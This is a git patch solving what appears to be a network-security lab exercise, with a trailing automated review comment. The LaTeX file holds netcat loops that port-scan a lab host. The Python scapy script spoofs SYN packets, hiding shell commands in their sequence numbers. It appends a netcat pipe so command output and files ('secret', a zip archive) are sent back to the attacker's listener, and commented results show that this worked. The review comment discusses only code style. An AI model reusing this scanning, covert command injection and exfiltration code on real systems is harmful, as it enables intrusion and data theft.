From e93aa50de29936d9d099abaa8d68e472abcb33f1 Mon Sep 17 00:00:00 2001
From: David Kaufmann
Date: Fri, 18 Dec 2015 17:21:15 +0100
Subject: [PATCH] solve exercise3
---
 exercise3.tex | 10 +++++
 exercise3/New Text Documnet.txt.zip | Bin 0 -> 381 bytes
 exercise3/generator.py | 64 ++++++++++++++++++++++++++++
 3 files changed, 74 insertions(+)
 create mode 100644 exercise3.tex
 create mode 100644 exercise3/New Text Documnet.txt.zip
 create mode 100755 exercise3/generator.py
diff --git a/exercise3.tex b/exercise3.tex
new file mode 100644
index 0000000..9df2fee
--- /dev/null
+++ b/exercise3.tex
@@ -0,0 +1,10 @@
+\section{Rep:3.a}
+
+scan the host
+
+for i in `seq 1 1000`; do echo "test" | nc -w1 192.168.67.115 \$i \& ; done
+for i in `seq 1 1000`; do echo "test" | nc -u -w1 192.168.67.115 \$i \& ; done
+
+
+
+\section{Rep:3.b}
diff --git a/exercise3/New Text Documnet.txt.zip b/exercise3/New Text Documnet.txt.zip
new file mode 100644
index 0000000000000000000000000000000000000000..d676887e204f7667a1ed62c41225b92236f299d2
GIT binary patch literal 381 zcmWIWW@Zs#U|`^2P@3E29(CdEiM>Fc0wV*1D1!`xUuwBRNNPoif=hmKX>Mv>iC#%X zNoWWs1GB^N%rFoxt>9*0WO>2NzyKypdk=CQG7xZi|6BC&Nv>-R0scxI6(adnoX5P9 zbv?o^eNnhpw|lmTxYIXYxM-PnJ+8Xw`7>e8dbjnxW}D_MzSn)aBf2XjX6s1*hW_EBo%w&aOj;4^7M6aPQjJmW=4oh;?0y93EtRe)6`vwj<&; zLz$R)SuA%|;p0P(*aN&7ndF#pg@yz$To@RD0mHDQ5yZj~Hms1aK?|1vZ&o&tCPpBP K2GTqra~J>|@P>;3 literal 0 HcmV?d00001
diff --git a/exercise3/generator.py b/exercise3/generator.py
new file mode 100755
index 0000000..f509c25
--- /dev/null
+++ b/exercise3/generator.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python
+
+# disable IPv6 error message
+import logging
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+from scapy.all import *
+logging.getLogger("scapy.runtime").setLevel(logging.WARN)
+
+#send(IP(dst='127.0.0.1')/TCP(sport=1337))
+
+# our pingback target
+src = '192.168.67.115'
+# our intermediate syn-servers
+dst = ['192.168.67.200', '192.168.67.210', '192.168.67.220']
+sport = 1337
+dport = 80
+# self
+self = '192.168.67.26'
+port = '1234'
+
+def sendchar(dst, char):
+ if char is not None:
+ ip=IP(src=src,dst=dst)
+ SYN=TCP(sport=sport,dport=dport,flags='S',seq=ord(char)-1)
+ send(ip/SYN)
+
+def run(cmd):
+ cmd += "|nc "+self+" "+port+"\r"
+ chunksize = 4
+ chunklist = [ cmd[i:i+chunksize] for i in range(0, len(cmd), chunksize) ]
+ for chunkid, chunk in enumerate(chunklist):
+ curdst = chunkid % len(dst)
+ for char in chunk:
+ sendchar(dst[curdst], char)
+
+#run("ip addr")
+"""
+ 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default
+ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
+ inet 127.0.0.1/8 scope host lo
+ valid_lft forever preferred_lft forever
+ inet6 ::1/128 scope host
+ valid_lft forever preferred_lft forever
+2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
+ link/ether 08:00:27:27:2b:f0 brd ff:ff:ff:ff:ff:ff
+ inet 192.168.67.115/24 brd 192.168.67.255 scope global eth0
+ valid_lft forever preferred_lft forever
+ inet6 fe80::a00:27ff:fe27:2bf0/64 scope link
+ valid_lft forever preferred_lft forever
+"""
+
+#run("pwd")
+"""
+/home/nsa
+"""
+
+#run("ls")
+"""
+New Text Documnet.txt.zip
+secret
+"""
+
+#run("cat secret") # copy file with 'nc -l 1234 > secret'
+run("cat *.zip") # copy file with 'nc -l 1234 > New\ Text\ Documnet.txt.zip'
--
2.43.0
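Review bot: The `dst` parameter of `sendchar` shadows the module-level `dst` list that `run` indexes, and the module-level name `self` reads like a method receiver, which makes the two functions harder to follow than they need to be; `def sendchar(host, char):` with `ip=IP(src=src,dst=host)`, and names like `listen_host`/`listen_port` in place of `self`/`port`, would remove the ambiguity. `port` is also the only one of the address constants kept as a string (`'1234'`) while `sport` and `dport` are ints — it only works because `run` concatenates it into the command text, so either a comment such as `# kept as str: only ever joined into the command string` or an int plus `str()` at the join would make that deliberate. The `if char is not None:` guard in `sendchar` is dead as written, since `run` only ever passes characters sliced from a string. The wildcard `from scapy.all import *` pulls a large namespace into the module; importing `IP`, `TCP` and `send` explicitly would document what the script actually depends on.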